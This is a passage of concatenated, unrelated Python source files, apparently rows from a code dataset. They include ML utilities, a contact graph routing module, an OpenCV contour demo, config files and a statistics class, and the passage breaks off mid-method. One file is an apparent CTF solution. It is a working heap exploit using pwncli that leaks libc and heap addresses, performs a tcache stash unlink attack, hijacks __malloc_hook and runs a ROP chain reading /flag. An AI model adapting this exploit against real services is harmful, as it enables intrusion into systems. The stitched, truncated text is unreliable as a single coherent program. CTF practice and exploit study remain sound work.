            tf.random.set_seed(i)      # TensorFlow 2.x API
        except AttributeError:
            tf.set_random_seed(i)      # TensorFlow 1.x fallback (removed in TF2)
    np.random.seed(i)
    random.seed(i)
#def explained_variance_non_mpi(ypred,y):
# """
# Computes fraction of variance that ypred explains about y.
# Returns 1 - Var[y-ypred] / Var[y]
#
# interpretation:
# ev=0 => might as well have predicted zero
# ev=1 => perfect prediction
# ev<0 => worse than just predicting zero
#
# """
# assert y.ndim == 1 and ypred.ndim == 1
# vary = np.var(y)
# return np.nan if vary==0 else 1 - np.var(y-ypred)/vary
#
#def mpi_var(x):
# return mpi_moments(x)[1]**2
#
#def explained_variance(ypred,y):
# """
# Computes fraction of variance that ypred explains about y.
# Returns 1 - Var[y-ypred] / Var[y]
#
# interpretation:
# ev=0 => might as well have predicted zero
# ev=1 => perfect prediction
# ev<0 => worse than just predicting zero
#
# """
# assert y.ndim == 1 and ypred.ndim == 1
# vary = mpi_var(y)
# return np.nan if vary==0 else 1 - mpi_var(y-ypred)/vary
def add_noise(img, noise_p, noise_type):
    """Add blocky Gaussian noise to a random subset of images in a batch.

    :param img: uint8 image batch of shape (N, H, W, C); mutated in place.
        Assumes 84x84 frames -- TODO confirm against callers.
    :param noise_p: per-image probability of receiving noise
    :param noise_type: unused; kept for interface compatibility
    :return: the batch clipped to [0, 255] (note: np.clip returns a new
        float64 array, so the returned dtype differs from the input's uint8)
    """
    # BUG FIX: np.bool was removed in NumPy 1.24 -- use the builtin bool.
    noise_mask = np.random.binomial(1, noise_p, size=img.shape[0]).astype(bool)
    w = 12          # side length of one square noise block in pixels
    n = 84 // 12    # number of blocks per image axis (assumes 84x84 frames)
    # One shared random subset of 10-39 blocks is perturbed in every noisy image.
    idx_list = np.arange(n * n)
    random.shuffle(idx_list)
    idx_list = idx_list[:np.random.randint(10, 40)]
    for i in range(img.shape[0]):
        if not noise_mask[i]:
            continue
        for idx in idx_list:
            y = (idx // n) * w
            x = (idx % n) * w
            # uint8 addition wraps modulo 256 -- NOTE(review): presumably the
            # original intent; verify if saturation was wanted instead.
            img[i, y:y+w, x:x+w, -1] += np.random.normal(0, 255*0.3, size=(w, w)).astype(np.uint8)
    img = np.clip(img, 0., 255.)
    return img
# Single-element cache for the lazily loaded default PIL font.
g_font = [None]
def draw_text_to_image(text, height=None, width=None, channels=None):
    """Render *text* into a uint8 numpy image.

    :param text: string to draw; may contain newlines
    :param height: output height in pixels; defaults to the rendered text height
    :param width: output width in pixels; defaults to the rendered text width
    :param channels: if given, produce an (H, W, channels) image; otherwise a
        grayscale (H, W) image
    :return: uint8 numpy array containing the rendered text
    """
    from PIL import Image, ImageDraw, ImageFont
    if g_font[0] is None:
        g_font[0] = ImageFont.load_default()
    font = g_font[0]
    # ImageFont.ImageFont.getsize doesn't work for multi-line strings.
    # https://github.com/python-pillow/Pillow/issues/2966
    dummy_img = Image.fromarray(np.zeros((1, 1), dtype=np.uint8))
    dummy_draw = ImageDraw.Draw(dummy_img)
    try:
        text_size = dummy_draw.textsize(text, font=font)
    except AttributeError:
        # Pillow >= 10 removed Draw.textsize; measure via the bounding box.
        left, top, right, bottom = dummy_draw.multiline_textbbox((0, 0), text, font=font)
        text_size = (right - left, bottom - top)
    if channels is None:
        shape = (height or text_size[1], width or text_size[0])
    else:
        shape = (height or text_size[1], width or text_size[0], channels)
    i = np.zeros(shape, dtype=np.uint8)
    img = Image.fromarray(i)
    draw = ImageDraw.Draw(img)
    # BUG FIX: (255,) * None raised TypeError whenever channels was None
    # (the grayscale default path); use a scalar fill for grayscale images.
    fill = 255 if channels is None else (255,) * channels
    draw.text((3, 0), text, font=font, fill=fill)
    return np.asarray(img)
def get_percentile_indices(data, percentiles=np.arange(0.0, 1.05, 0.1)):
    """Return indices into 1-D *data* located at the requested quantile positions.

    For each percentile p the element ranked at p * (len(data) - 1) in the
    ascending order of *data* is selected; its original index is returned.
    """
    assert len(data.shape) == 1
    ascending_order = np.argsort(data)
    rank_positions = (percentiles * (len(ascending_order) - 1)).astype(int)
    return ascending_order[rank_positions]
class CContext():
    """Lazily-evaluated, dependency-tracking state registry.

    States are registered as factory callables via :meth:`register_state` and
    evaluated on first attribute access.  Any state accessed while another
    state's factory is running is recorded as a dependency, so that
    :meth:`invalidate_state` can cascade invalidation to dependents.
    """
    def __init__(self, verbose=False, print_func=print):
        # name -> factory callable taking this context, returning the value
        self._state_funcs = OrderedDict()
        # name -> cached value; a key is present only after first evaluation
        self._evaluated_states = OrderedDict()
        # name -> set of state names that (transitively) read this state
        self._dependencies = defaultdict(set)
        # stack of state names currently being evaluated (dependency capture)
        self._eval_context = []
        self._verbose = verbose
        self._print_func = print_func
    def register_state(self, name, create):
        """Register factory `create` under `name`; raise if already registered."""
        if name in self._state_funcs:
            raise Exception('State already registered: {}'.format(name))
        self._state_funcs[name] = create
    def invalidate_state(self, name):
        """Drop the cached value of `name` and, recursively, of its dependents."""
        if name not in self._evaluated_states:
            return
        del self._evaluated_states[name]
        if self._verbose:
            self._print_func('Invalidated state "{}"'.format(name))
        # Cascade to every state that read this one while evaluating.
        for n in self._dependencies[name]:
            self.invalidate_state(n)
        # Safe even for unseen names: the loop above materialized the
        # defaultdict entry.
        del self._dependencies[name]
    def __getattr__(self, attr):
        # Invoked only for names not found through normal lookup, i.e. states.
        if attr not in self._state_funcs:
            raise Exception('Unknown state {}'.format(attr))
        if attr in self._eval_context:
            raise Exception('Circular dependency detected: {}, {}'.format(attr, self._eval_context))
        # Every state currently being evaluated depends on this one.
        self._dependencies[attr] = self._dependencies[attr].union(set(self._eval_context))
        if attr not in self._evaluated_states:
            self._eval_context.append(attr)
            evaluated_state = self._state_funcs[attr](self)
            if self._verbose:
                self._print_func('Evaluated state "{}"'.format(attr))
            self._eval_context.pop()
            self._evaluated_states[attr] = evaluated_state
        return self._evaluated_states[attr]
class EmptyClass:
    """Bare container used as an ad-hoc attribute namespace."""
# From https://github.com/openai/large-scale-curiosity/blob/0c3d179fd61ee46233199d0891c40fbe7964d3aa/cppo_agent.py#L226-L236
class RewardForwardFilter(object):
    """Discounted running sum of rewards: r_t + gamma * r_{t-1} + gamma^2 * ..."""
    def __init__(self, gamma):
        # No rewards seen yet; first update() simply adopts its argument.
        self.rewems = None
        self.gamma = gamma
    def update(self, rews):
        """Fold a new reward (batch) into the discounted sum and return it."""
        self.rewems = rews if self.rewems is None else self.rewems * self.gamma + rews
        return self.rewems
class RunningMeanStd(object):
    """Running estimate of mean and variance over a stream of batches.

    Uses Chan et al.'s parallel algorithm:
    https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm
    """
    def __init__(self, epsilon=1e-4, shape=()):
        # epsilon seeds the count so the very first merge cannot divide by zero
        self.mean = np.zeros(shape, 'float64')
        self.var = np.ones(shape, 'float64')
        self.count = epsilon
    def update(self, x):
        """Fold a batch (axis 0 = batch dimension) into the running moments."""
        self.update_from_moments(np.mean(x, axis=0), np.var(x, axis=0), x.shape[0])
    def update_from_moments(self, batch_mean, batch_var, batch_count):
        """Merge externally computed batch moments into the running state."""
        merged = update_mean_var_count_from_moments(
            self.mean, self.var, self.count, batch_mean, batch_var, batch_count)
        self.mean, self.var, self.count = merged
class SimpleWeightedMovingScalarMeanStd():
    """Exponentially weighted moving mean and variance of scalar batches."""
    def __init__(self, alpha=0.0001):
        # alpha is the weight of the newest batch in the moving averages
        self._alpha = alpha
        self.mean = 0.0
        self.var = 1.0
    def update(self, values):
        """Blend a batch of values into the moving mean, then the moving variance.

        Note the variance uses deviations from the *updated* mean.
        """
        a = self._alpha
        self.mean = (1 - a) * self.mean + a * np.mean(values)
        self.var = (1 - a) * self.var + a * np.mean(np.square(values - self.mean))
def update_mean_var_count_from_moments(mean, var, count, batch_mean, batch_var, batch_count):
    """Merge two sets of (mean, variance, count) moments into one.

    Implements the parallel/merging form of Welford's variance algorithm
    (Chan et al.): combines a running estimate with the moments of a new batch
    and returns the merged ``(mean, var, count)`` triple.
    """
    total = count + batch_count
    delta = batch_mean - mean
    merged_mean = mean + delta * batch_count / total
    # Sum of squared deviations of both parts plus the between-part correction.
    m2 = var * count + batch_var * batch_count + np.square(delta) * count * batch_count / total
    return merged_mean, m2 / total, total
| 10,853 | 3,856 |
class Location:
    """A 2-D board coordinate, usable as a dict key / set element."""
    def __init__(self, x: int, y: int):
        self.x = x
        self.y = y
    def getX(self) -> int:
        return self.x
    def getY(self) -> int:
        return self.y
    def __eq__(self, value):
        # BUG FIX: comparing against a non-Location (e.g. None) used to raise
        # AttributeError; NotImplemented lets Python fall back gracefully.
        if not isinstance(value, Location):
            return NotImplemented
        return self.x == value.x and self.y == value.y
    def __hash__(self):
        # Tuple hash is consistent with __eq__ and cheaper than formatting
        # the coordinates into a string first.
        return hash((self.x, self.y))
    def __repr__(self):
        return f"Location({self.x}, {self.y})"
class Placement:
    """A pawn of a given type placed at a board location inside a room."""

    # pawn type -> display symbol; any unknown type renders as "N"
    _PAWN_SYMBOLS = {0: "X", 1: "O"}

    def __init__(self, code: int, pawnType: int, location: Location):
        self.code = code
        self.pawnType = pawnType
        self.location = location

    def getLocation(self) -> Location:
        """Board location of this placement."""
        return self.location

    def getPawnType(self) -> int:
        """Numeric pawn type (0 or 1 for the two players)."""
        return self.pawnType

    def getPawnSymbol(self) -> str:
        """Single-character display symbol for this pawn."""
        return self._PAWN_SYMBOLS.get(self.pawnType, "N")

    def getRoomCode(self) -> int:
        """Identifier of the room this placement belongs to."""
        return self.code
| 901 | 302 |
from adapters.lumi.aqara_opple_switch import AqaraOppleSwitch
class WXCJKG13LM(AqaraOppleSwitch):
    """Aqara Opple wireless switch, six-button variant (model WXCJKG13LM)."""

    def __init__(self):
        # This model is the six-button member of the Opple switch family.
        super().__init__(6)
| 191 | 78 |
"""Module of commonly shared functions of various flavours of CGR."""
import math
def cgr_neighbor_function(contact_graph, node, destination, current_distance,
                          set_visited, suppressed_contacts, lookahead_time):
    """Neighbor function of CGR used by the Dijkstra algorithm.

    Used to determine feasible direct neighbors of a given node.

    Args:
        contact_graph (ContactGraph): The topology information in the form
            of a contact graph
        node (tuple): The evaluated node in the contact graph node form
            ``(from_node, to_node, from_time, to_time, data_rate)``.
        destination (tuple): The nominal destination node in the form
            ``(destination_id, destination_id, 0, math.inf, math.inf)``
        current_distance (int): Contains the weight of the shortest path
            to the currently investigated node (in ms).
        set_visited (set): Set used for storing the visited flag
            of nodes during the Dijkstra runs. Also used for excluding
            suppressed (physical) nodes.
        suppressed_contacts (list): List of contacts that shall not be
            considered for forwarding (and thus neighbor selection)
        lookahead_time (int): Time value that specifies a time window
            (or rather a maximum time) only in which routes are searched.
            This reduces the time necessary to find a shortest route.

    Returns:
        list: A list of all feasible neighbors with items of the form
        ``(<node_id>, weight)`` with ``<node_id>`` representing a certain
        contact in the contact graph.
    """
    neighbors = []
    # Set the node as visited
    set_visited.add(node.from_node)
    # Walk the successor contacts of the given node (sorted by to_time)
    for edge in contact_graph.graph[node].successors:
        # Break the loop if the found edge to_time is smaller than the
        # current distance. As the successor list is sorted, all subsequent
        # edges will be smaller as well.
        if edge.to_time <= current_distance:
            break
        # Only consider when neighbor has not been visited by dijkstra yet
        # and it is not in the suppressed_contacts list
        # and can be reached given the currently considered point in time
        # and if it is within the lookahead window (only when a lookahead
        # window is used)
        if ((lookahead_time is None or edge.from_time < lookahead_time)
                and edge.to_node not in set_visited
                and edge not in suppressed_contacts
                and (edge.to_time > current_distance)):
            # Only add to neighbors if no artificial end node or artificial end
            # node is bundle's destination
            if edge == destination or edge.from_node != edge.to_node:
                # Calculate the time (which is either positive or 0, relevant
                # for artificial terminal nodes)
                weight = edge.from_time - current_distance
                weight = max(weight, 0)
                # Append to neighbor list with weight
                neighbors.append((edge, weight))
    return neighbors
def cgr_get_route_characteristics(route, distance):
    """Calculate characteristics of a certain route.

    Args:
        route (list): A list of the nodes of the calculated route that's
            elements comprise of all relevant information for determining the
            characteristics'
        distance (int): The precalculated distance

    Returns:
        tuple: A tuple consisting of the (precalculated) distance, the capacity
        and the end time of the availability of that route
    """
    capacity = math.inf
    # NOTE(review): the `distance` argument is discarded here and recomputed
    # from the route below, contradicting the docstring's "precalculated
    # distance" -- either the parameter or this reset is redundant; confirm
    # against callers before changing either.
    distance = 0
    # Iterate over all nodes in route and check if capacity is smaller than
    # already found minimum
    for node in route:
        # Effective start time at this contact: latest from_time seen so far
        distance = max(distance, node.from_time)
        # Generate capacity for node's contact
        capacity_new = ((node.to_time - distance) * node.datarate)
        # Update capacity if smaller
        if capacity_new < capacity:
            capacity = capacity_new
    # The to_time of a route is the minimum end time of a contact within this
    # route (minus the assumed signal propagation delay, in the rr considered
    # to be neglegible)
    to_time = min([node.to_time for node in route])
    # Return the characteristics tuple consisting of the route distance (i.e.
    # the arrival time), the route capacity and the route availability end
    # time (i.e. the to-time)
    return (distance, capacity, to_time)
| 4,565 | 1,150 |
from dataclasses import dataclass
from typing import Callable
from rxbp.multicast.multicastobserver import MultiCastObserver
from rxbp.multicast.typing import MultiCastItem
@dataclass
class MapMultiCastObserver(MultiCastObserver):
    """Observer that applies ``func`` to every element flowing to ``source``.

    source -- downstream observer receiving the mapped items
    func -- mapping applied to each element of an emitted batch
    """
    source: MultiCastObserver
    func: Callable[[MultiCastItem], MultiCastItem]

    def on_next(self, item: MultiCastItem) -> None:
        def map_gen():
            # NOTE(review): mapping happens lazily when the downstream
            # observer iterates, so exceptions raised by ``func`` surface
            # there rather than in the try-block below; only errors raised
            # while *creating* the generator are caught here.
            for v in item:
                yield self.func(v)
        try:
            # Renamed from `next`, which shadowed the builtin of the same name.
            mapped_items = map_gen()
        except Exception as exc:
            self.source.on_error(exc)
        else:
            self.source.on_next(mapped_items)

    def on_error(self, exc: Exception) -> None:
        """Forward errors downstream unchanged."""
        self.source.on_error(exc)

    def on_completed(self) -> None:
        """Forward completion downstream unchanged."""
        self.source.on_completed()
# Read three integer scores from stdin and print their arithmetic mean.
# (Renamed the misleading variables: `Average` actually held a single score
# and `For3Scores` was an unused loop counter.)
total_score = 0
for _ in range(3):
    total_score += int(input())
print(total_score / 3)
| 112 | 53 |
from decouple import config
# Bounds used when generating/selecting prime numbers elsewhere in the project.
RANGE_OF_PRIME_NUMBERS = {
    "min": 10,
    "max": 190
}
# Database connection settings, read from the environment via python-decouple.
DATABASE = {
    'type': config("TYPE"),
    'user': config("USER"),
    'password': config("PASSWORD"),
    # NOTE(review): the key is named 'localhost' but presumably holds the DB
    # host address -- verify against the consumers of this dict.
    'localhost': config("LOCALHOST"),
    'database_name': config("DATABASE_NAME")
}
# Filesystem location where the RSA public key is stored.
PATH_FOR_PUBLIC_KEY = "/home/risoko/Pulpit/public_key"
# Key lifetime components (days/minutes/seconds) before keys expire.
KEYS_EXPIRE = {
    "DAYS": 0,
    "MINUTES": 10,
    "SECONDS": 0
}
# Clean a scraped/pandas-dumped 2017 results file into comma-separated rows.
# Each input line is stripped of dump artifacts, tokenized, and then patched
# positionally (merging multi-word names, inserting '0' placeholders for
# missing columns) until it matches the expected column layout.
with open('./data/data2017.txt') as f:
    lines = f.readlines()
for ln in lines:
    # Remove pandas-dump noise (dtype tags, punctuation) before tokenizing.
    ln = ln.replace(',', '').replace(':', '').replace('int64', '') \
        .replace('Name', '').replace('dtype', '').replace('/', ' ') \
        .replace('object', '').replace('float64', ' ') \
        .replace('NaN', '').replace('NaN', ' ') \
        .replace('.', ' ')
    text = ln.split()
    # Drop up to three leading index/serial numbers.
    if text[0].isnumeric():
        text.pop(0)
    if text[0].isnumeric():
        text.pop(0)
    if text[0].isnumeric():
        text.pop(0)
    # Merge a multi-word first field (up to two extra words) into one token.
    if not text[1].isnumeric():
        text[0] = f'{text[0]} {text[1]}'
        text.pop(1)
    # Missing numeric columns after the name: pad with '0' placeholders.
    if not text[2].isnumeric():
        text.insert(2, '0')
        text.insert(3, '0')
    if not text[1].isnumeric():
        text[0] = f'{text[0]} {text[1]}'
        text.pop(1)
    # Same merge treatment for a multi-word field at position 4.
    if len(text) > 6 and not text[5].isnumeric():
        text[4] = f'{text[4]} {text[5]}'
        text.pop(5)
    if len(text) > 6 and not text[5].isnumeric():
        text[4] = f'{text[4]} {text[5]}'
        text.pop(5)
    if len(text) > 7 and not text[6].isnumeric():
        text.insert(6, '0')
        text.insert(7, '0')
    # And for a multi-word field at position 8 (up to three extra words).
    if len(text) > 9 and not text[9].isnumeric():
        text[8] = f'{text[8]} {text[9]}'
        text.pop(9)
    if len(text) > 9 and not text[9].isnumeric():
        text[8] = f'{text[8]} {text[9]}'
        text.pop(9)
    if len(text) > 9 and not text[9].isnumeric():
        text[8] = f'{text[8]} {text[9]}'
        text.pop(9)
    if len(text) > 7 and not text[7].isnumeric():
        text.insert(7, '0')
        text.insert(9, '0')
    # Pad short rows up to the expected column count.
    if len(text) == 10:
        text.insert(9, '0')
    if len(text) == 10:
        text.insert(9, '0')
    if len(text) == 11 and text[9].isnumeric() and int(text[9].strip())>100:
        text.insert(9, '0')
    if len(text) == 7:
        text.insert(1, '0')
        text.insert(3, '0')
        text.insert(6, '0')
        text.insert(7, '0')
        text.insert(9, '0')
    # Lines containing any of these tokens are headers/summary rows -- skip.
    notwanted = ['-------------------------------', 'CONSTITUENCY_NAME', 'GRAND TOTAL', 'CAW']
    if not set(text) & set(notwanted):
        # Prepend the field count and emit the row as CSV.
        text.insert(0, f'{len(text)}')
        s = ','.join(text)
        print(f'  {s}')
| 2,413 | 874 |
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
import cv2 as cv
"""
Morphological analysis application - contour analysis based on the basic
morphological gradient.

Binarizing the morphological gradient (instead of thresholding the raw
image) usually produces a cleaner segmentation for contour analysis, and
is one of the common preprocessing steps for OCR. Pipeline:
    1. morphological gradient of the image
    2. grayscale conversion
    3. global (Otsu) threshold binarization
    4. contour analysis
"""
def main():
    """Detect small text-sized contours in ../../pic/1.jpg and box them in red."""
    src = cv.imread("../../pic/1.jpg")
    # Median blur suppresses salt-and-pepper noise before the gradient.
    blur = cv.medianBlur(src, 3)
    kernel = cv.getStructuringElement(cv.MORPH_RECT, (3, 3))
    # Morphological gradient (dilation - erosion) highlights edges.
    gradient = cv.morphologyEx(blur, cv.MORPH_GRADIENT, kernel)
    cv.imshow("gradient", gradient)
    gray = cv.cvtColor(gradient, cv.COLOR_BGR2GRAY)
    # Otsu chooses the global threshold automatically (the 0 is ignored).
    _, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)
    cv.imshow("binary", binary)
    # binary = cv.morphologyEx(binary, cv.MORPH_DILATE, cv.getStructuringElement(cv.MORPH_CROSS, (3, 3)))  # dilation with a 3x3 cross kernel
    contours, _ = cv.findContours(binary, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
    if 0 == len(contours):
        print("未搜寻到结果")  # "no results found" (user-facing string kept verbatim)
        return
    for index in range(len(contours)):
        contour = contours[index]
        x, y, w, h = cv.boundingRect(contour)  # bounding rectangle of the contour
        area = cv.contourArea(contour)  # contour area
        # Keep only small regions with a text-like height.
        if not 10 < area < 500 or not 10 < h < 60:
            continue
        cv.rectangle(src, (x, y), (x + w, y + h), (0, 0, 255), 2, cv.LINE_8)
    cv.imshow("src", src)
    cv.waitKey(0)
    cv.destroyAllWindows()
if "__main__" == __name__:
    main()
| 1,423 | 747 |
import sys
from loguru import logger
from rich.console import Console, RenderGroup
from rich.panel import Panel
from vaccibot.constants import LOGURU_FORMAT
from vaccibot.parsing import ARGS
from vaccibot.process import retrieve_all_suitable_appointments
from vaccibot.render import make_department_table
# Swap loguru's default sink for a stdout sink at the CLI-selected level.
logger.remove()
logger.add(sys.stdout, level=ARGS.logs.upper(), format=LOGURU_FORMAT)
@logger.catch()
def main() -> None:
    """Fetch suitable vaccination appointments and render them in the terminal."""
    console = Console()
    appointments_by_department: dict = retrieve_all_suitable_appointments()
    # One bordered panel per department; departments with no appointments
    # are skipped entirely.
    panels = [
        Panel(
            make_department_table(appointments),
            title=department,
            expand=True,
            border_style="scope.border",
        )
        for department, appointments in appointments_by_department.items()
        if appointments
    ]
    console.print(*panels)
if __name__ == "__main__":
    main()
| 1,118 | 317 |
from pwncli import *
cli_script()
# pwncli "gift" objects: the process/remote tube plus the loaded ELF and libc.
p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']
# ROP gadget offsets inside the target libc (found with a gadget finder).
pop_rdi_ret = 0x26542
pop_rsi_ret = 0x26f9e
pop_rdx_ret = 0x12bda6
pop_rax_ret = 0x47cf8
syscall_ret = 0xcf6c5
def debut(idx, size, name="a"):
    """Menu option 1: create hero `idx` with a `size`-byte name.

    `name` (str or bytes) is right-padded with 'a' to exactly `size` bytes
    so the allocation request always has the intended length.
    """
    pad = "a" if isinstance(name, str) else b"a"
    name = name.ljust(size, pad)
    p.sendlineafter("> ", "1")
    p.sendlineafter("idx: ", str(idx))
    p.sendafter("hero name: ", name)
def rename(idx, name):
    """Menu option 2: overwrite hero `idx`'s name with `name` (no padding)."""
    p.sendlineafter("> ", "2")
    p.sendlineafter("idx: ", str(idx))
    p.sendafter("hero name: ", name)
def show(idx):
    """Menu option 3: display hero `idx` and return the leaked name as a u64."""
    p.sendlineafter("> ", "3")
    p.sendlineafter("idx: ", str(idx))
    p.recvuntil("hero name: ")
    # Strip the trailing newline, zero-pad to 8 bytes, unpack little-endian.
    return u64(p.recvline()[:-1].ljust(8, b"\x00"))
def retire(idx):
    """Menu option 4: retire (free) hero `idx`."""
    p.sendlineafter("> ", "4")
    p.sendlineafter("idx: ", str(idx))
def punch(data):
    """Hidden menu option 50056: send `data` raw and wait for the banner.

    NOTE(review): used below as the out-of-bounds write primitive -- confirm
    the exact overflow target in the binary.
    """
    p.sendlineafter("> ", "50056")
    p.send(data)
    p.recvuntil("Serious Punch!!!\n")
# Tcache stash unlink attack (5 tcache entries pre-staged) to obtain an
# allocation at an arbitrary address, then ORW ROP chain via __malloc_hook.
def attack1():
    # Leak the heap base from a freed chunk's tcache/fd pointer.
    debut(0, 0x400)
    retire(0)
    debut(1, 0x400)
    retire(1)
    heap_base_addr = show(1) - 0x260
    log_address("heap_base_addr", heap_base_addr)
    # More frees of the 0x400 size so a later free lands in the unsorted bin.
    for i in range(5):
        debut(0, 0x400)
        retire(0)
    debut(0, 0x400)
    # Stage five 0x220-sized tcache entries for the stash unlink.
    for i in range(5):
        debut(1, 0x210)
        retire(1)
    retire(0)
    # Unsorted-bin chunk's fd points into main_arena: leak libc base.
    libc_base_addr = show(0) - 0x1e4ca0
    libc.address = libc_base_addr
    log_address("libc_base_addr", libc_base_addr)
    # split chunk
    debut(1, 0x1e0)
    # get smallbin chunk
    debut(1, 0x400)
    # Forge two fake 0x220 smallbin chunks; the corrupted bk makes the
    # stash unlink write a libc pointer to the chosen target.
    payload = flat({
        0: [0, 0x221, heap_base_addr + 0x20b0, libc_base_addr + 0x1e4bf8],
        0x1e0: [0, 0x221, 0xdeadbeef, heap_base_addr + 0x1ed0]
    }, filler="\x00")
    rename(0, payload)
    # to trigger tcache stash unlink
    debut(1, 0x210)
    # to change __malloc_hook
    payload = flat({
        0x20: "/flag\x00\x00\x00",
        0x28: libc_base_addr + 0x99540
    })
    punch(payload)
    # open/read/write syscall ROP chain that dumps /flag.
    layout = [
        libc_base_addr + pop_rdi_ret,  # rdi
        libc.sym["__malloc_hook"] - 8,
        libc_base_addr + pop_rsi_ret,  # rsi
        0,
        libc_base_addr + pop_rax_ret,  # rax
        2,  # open("/flag", 0)
        libc_base_addr + syscall_ret,  # syscall
        libc_base_addr + pop_rdi_ret,
        3,
        libc_base_addr + pop_rsi_ret,
        heap_base_addr + 0x400,
        libc_base_addr + pop_rdx_ret,
        0x30,
        libc_base_addr + pop_rax_ret,
        0,  # read
        libc_base_addr + syscall_ret,
        libc_base_addr + pop_rdi_ret,
        1,
        libc_base_addr + pop_rax_ret,
        1,
        libc_base_addr + syscall_ret
    ]
    debut(1, 0x300, flat(layout))
    p.interactive()
# Variant: tcache stash unlink with 6 staged entries, which also writes a
# heap address to an arbitrary location (here: near an exploitable chunk).
def attack2():
    # Leak the heap base from a freed chunk's tcache/fd pointer.
    debut(0, 0x400)
    retire(0)
    debut(1, 0x400)
    retire(1)
    heap_base_addr = show(1) - 0x260
    log_address("heap_base_addr", heap_base_addr)
    for i in range(5):
        debut(0, 0x400)
        retire(0)
    debut(0, 0x400)
    # Stage six 0x300-sized tcache entries for the stash unlink.
    for i in range(6):
        debut(1, 0x2f0)
        retire(1)
    debut(2, 0x210)
    retire(2)
    # stop()
    retire(0)
    # Unsorted-bin fd points into main_arena: leak libc base.
    libc_base_addr = show(0) - 0x1e4ca0
    libc.address = libc_base_addr
    log_address("libc_base_addr", libc_base_addr)
    # split chunk
    debut(1, 0x100)
    # get smallbin chunk
    debut(1, 0x400)
    # Forge two fake 0x300 smallbin chunks; the bk target receives a heap
    # pointer during the stash unlink.
    payload = flat({
        0: [0, 0x301, heap_base_addr + 0x1fd0, heap_base_addr + 0x20 - 5],
        0x100: [0, 0x301, 0xdeadbeef, heap_base_addr + 0x1ed0]
    }, filler="\x00")
    rename(0, payload)
    # to trigger tcache stash unlink
    debut(1, 0x2f0)
    stop()
    # Redirect hero 2's name pointer at __malloc_hook - 8, then overwrite
    # it via punch() with a pivot gadget.
    rename(2, p64(libc.sym['__malloc_hook']-8))
    punch("a" * 0x60)
    punch(b"/flag\x00\x00\x00" + p64(libc_base_addr + 0x8cfd6)) # add rsp 0x48; ret
    # open/read/write syscall ROP chain that dumps /flag.
    layout = [
        libc_base_addr + pop_rdi_ret,  # rdi
        libc.sym["__malloc_hook"] - 8,
        libc_base_addr + pop_rsi_ret,  # rsi
        0,
        libc_base_addr + pop_rax_ret,  # rax
        2,  # open("/flag", 0)
        libc_base_addr + syscall_ret,  # syscall
        libc_base_addr + pop_rdi_ret,
        3,
        libc_base_addr + pop_rsi_ret,
        heap_base_addr + 0x400,
        libc_base_addr + pop_rdx_ret,
        0x30,
        libc_base_addr + pop_rax_ret,
        0,  # read
        libc_base_addr + syscall_ret,
        libc_base_addr + pop_rdi_ret,
        1,
        libc_base_addr + pop_rax_ret,
        1,
        libc_base_addr + syscall_ret
    ]
    debut(1, 0x300, flat(layout))
    p.interactive()
attack2()
import voluptuous as vol
from pi4home.components import text_sensor
import pi4home.config_validation as cv
from pi4home.const import CONF_ID, CONF_LAMBDA, CONF_NAME, CONF_TEXT_SENSORS
from pi4home.cpp_generator import add, process_lambda, variable
from pi4home.cpp_types import std_vector
CustomTextSensorConstructor = text_sensor.text_sensor_ns.class_('CustomTextSensorConstructor')
# Schema: a required C++ lambda returning the vector of text-sensor pointers,
# plus the list of text sensors the lambda populates.
PLATFORM_SCHEMA = text_sensor.PLATFORM_SCHEMA.extend({
    cv.GenerateID(): cv.declare_variable_id(CustomTextSensorConstructor),
    vol.Required(CONF_LAMBDA): cv.lambda_,
    vol.Required(CONF_TEXT_SENSORS):
        cv.ensure_list(text_sensor.TEXT_SENSOR_SCHEMA.extend({
            cv.GenerateID(): cv.declare_variable_id(text_sensor.TextSensor),
        })),
})
def to_code(config):
    """Generate C++ code for the custom text-sensor platform.

    Written as a code-generation coroutine: each `yield` lets the generator
    resolve the pending expression before execution continues.
    """
    for template_ in process_lambda(config[CONF_LAMBDA], [],
                                    return_type=std_vector.template(text_sensor.TextSensorPtr)):
        yield
    rhs = CustomTextSensorConstructor(template_)
    custom = variable(config[CONF_ID], rhs)
    for i, conf in enumerate(config[CONF_TEXT_SENSORS]):
        # Pget_text_sensor(i) is a pointer expression to the i-th sensor.
        rhs = custom.Pget_text_sensor(i)
        add(rhs.set_name(conf[CONF_NAME]))
        text_sensor.register_text_sensor(rhs, conf)
BUILD_FLAGS = '-DUSE_CUSTOM_TEXT_SENSOR'
| 1,277 | 448 |
import math
import operator
import six
class NegativePopulationSize(ValueError):
    """Raised when a collector sees more remove() calls than add() calls."""
    def __init__(self, typename):
        # Name of the aggregator type, interpolated into the message.
        self.typename = typename
        ValueError.__init__(self)
    def __str__(self):
        # Bug fix: `str(str(self))` recursed into __str__ forever; return
        # the human-readable message instead.
        return self.__unicode__()
    def __unicode__(self):
        return "More calls to %(type)s.remove() than to %(type)s.add()" % {"type": self.typename}
class NonPositivePopulationSize(ValueError):
    """Raised when an operation needs a non-empty population but has none."""
    def __init__(self, typename):
        # Name of the aggregator type, interpolated into the message.
        self.typename = typename
        ValueError.__init__(self)
    def __str__(self):
        # Bug fix: `str(str(self))` recursed into __str__ forever; return
        # the human-readable message instead.
        return self.__unicode__()
    def __unicode__(self):
        return "Need more calls to %(type)s.add() than to %(type)s.remove()" % {"type": self.typename}
class AbstractStdDev(object):
    """Common behaviour for standard-deviation-like aggregates.

    Subclasses provide getSqr() (the variance); this base converts it to a
    standard deviation and supports combining two aggregates with `+`.
    """
    def get(self):
        """Return the standard deviation (square root of the variance)."""
        variance = self.getSqr()
        return math.sqrt(variance)
    def __add__(self, other):
        """Combine two deviations by summing their variances."""
        combined_variance = self.getSqr() + other.getSqr()
        return StdDevSum(combined_variance)
class StdDevSum(AbstractStdDev):
    """An AbstractStdDev backed by a precomputed (already summed) variance."""
    def __init__(self, sqr):
        # sqr: the combined variance value.
        self.sqr = sqr
    def getSqr(self):
        """Return the stored variance."""
        return self.sqr
class StdDev(AbstractStdDev):
    """Incremental population standard deviation.

    Keeps running count/sum/sum-of-squares so values can be added and
    removed in O(1).
    """
    def __init__(self):
        self.count = 0
        self.sum = 0
        self.sqrsum = 0
    def add(self, value):
        """Include `value` in the population."""
        self.count += 1
        self.sum += value
        self.sqrsum += value**2
    def remove(self, value):
        """Remove a previously added `value`; the population must be non-empty."""
